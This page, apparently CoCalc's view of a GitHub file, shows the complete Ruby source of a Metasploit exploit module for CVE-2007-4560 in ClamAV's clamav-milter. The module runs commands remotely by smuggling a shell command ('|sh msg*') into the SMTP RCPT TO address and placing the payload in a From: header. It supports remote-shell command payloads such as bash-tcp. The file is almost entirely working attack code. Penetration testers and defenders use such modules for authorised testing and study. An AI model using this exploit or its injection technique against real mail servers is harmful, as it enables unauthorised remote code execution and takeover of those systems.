Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
19638 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Smtp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',

16
        'Description' => %q{

17
          This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'

18
          (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.

19
          When implemented with black hole mode enabled, it is possible to execute

20
          commands remotely due to an insecure popen call.

21
        },

22
        'Author' => [ 'aushack' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2007-4560' ],

26
          [ 'OSVDB', '36909' ],

27
          [ 'BID', '25439' ],

28
          [ 'EDB', '4761' ]

29
        ],

30
        'Privileged' => true,

31
        'Payload' => {

32
          'DisableNops' => true,

33
          'Space' => 1024,

34
          'Compat' =>

35
                        {

36
                          'PayloadType' => 'cmd cmd_bash',

37
                          'RequiredCmd' => 'generic perl ruby bash-tcp telnet',

38
                        }

39
        },

40
        'Platform' => 'unix',

41
        'Arch' => ARCH_CMD,

42
        'Targets' => [

43
          [ 'Automatic', {}],

44
        ],

45
        'DisclosureDate' => '2007-08-24',

46
        'DefaultTarget' => 0,

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),

58
      ]

59
    )

60
  end

61


62
  def exploit

63
    # ClamAV writes randomized msg.###### temporary files in a randomized

64
    # /tmp/clamav-#######################/ directory. This directory is

65
    # the clamav-milter process working directory.

66
    #

67
    # We *can* execute arbitrary code directly from 'sploit', however the

68
    # SMTP RFC rejects all payloads with the exception of generic CMD

69
    # payloads due to the IO redirects. I discovered that the 'From:'

70
    # header is written to this temporary file prior to the vulnerable

71
    # call, so we call the file itself and payload.encoded is executed.

72


73
    sploit = "sh msg*" # Execute the clamav-milter temporary file.

74


75
    # Create the malicious RCPT TO before connecting,

76
    # to make good use of the Msf::Exploit::Smtp support.

77


78
    oldaddr = datastore['MAILTO']

79
    newaddr = oldaddr.split('@')

80


81
    datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"

82


83
    connect_login

84


85
    sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header

86
    sock.put(".\r\n")

87


88
    # Clean up RCPT TO afterwards

89


90
    datastore['MAILTO'] = oldaddr

91


92
    handler

93
    disconnect

94
  end

95
end

96


97